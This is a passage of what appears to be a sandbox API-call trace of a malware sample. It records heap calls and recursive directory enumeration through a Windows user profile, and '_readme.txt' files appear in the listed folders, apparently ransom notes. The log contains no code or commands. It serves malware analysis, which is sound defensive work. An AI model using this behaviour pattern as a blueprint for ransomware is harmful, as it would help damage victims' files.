Flags=0x0, Size=0x60) returned 0x329b658 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3299fd0 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b6c0 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x329a028 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b0a8 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32618f0 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b520 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b5f0 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260fa8 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260b30 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c7a8a0 | out: hHeap=0x660000) returned 1 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260b30 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.386] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x32898e0 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32898e0 | out: hHeap=0x660000) returned 1 [0056.386] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260ce8 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260fa8 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.386] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b5f0 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b5f0 | out: hHeap=0x660000) returned 1 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.386] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260ce8 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261948 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.386] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260ce8 [0056.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0056.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0056.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b5f0 [0056.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x310) returned 0x326a370 [0056.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b520 [0056.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0056.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x73aa6f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x73aa6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0056.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ece8a70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ece8a70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.387] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.387] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0056.387] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.387] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165a8 | out: hHeap=0x660000) returned 1 [0056.387] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.387] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.387] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.387] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.387] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.387] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0056.387] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.387] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.387] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.388] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.388] PathFindFileNameW (pszPath="") returned="" [0056.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19bf9e70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x19bf9e70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0056.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0056.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0056.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0056.388] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.388] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0056.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.388] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.388] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.388] PathFindFileNameW (pszPath="") returned="" [0056.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0056.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269568 | out: hHeap=0x660000) returned 1 [0056.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.389] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0056.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.389] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.389] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.389] PathFindFileNameW (pszPath="") returned="" [0056.389] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.389] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.389] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0056.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0056.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0056.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0056.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0056.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0056.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0056.390] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.390] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.390] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0056.390] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.390] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.390] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.390] PathFindFileNameW (pszPath="") returned="" [0056.390] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 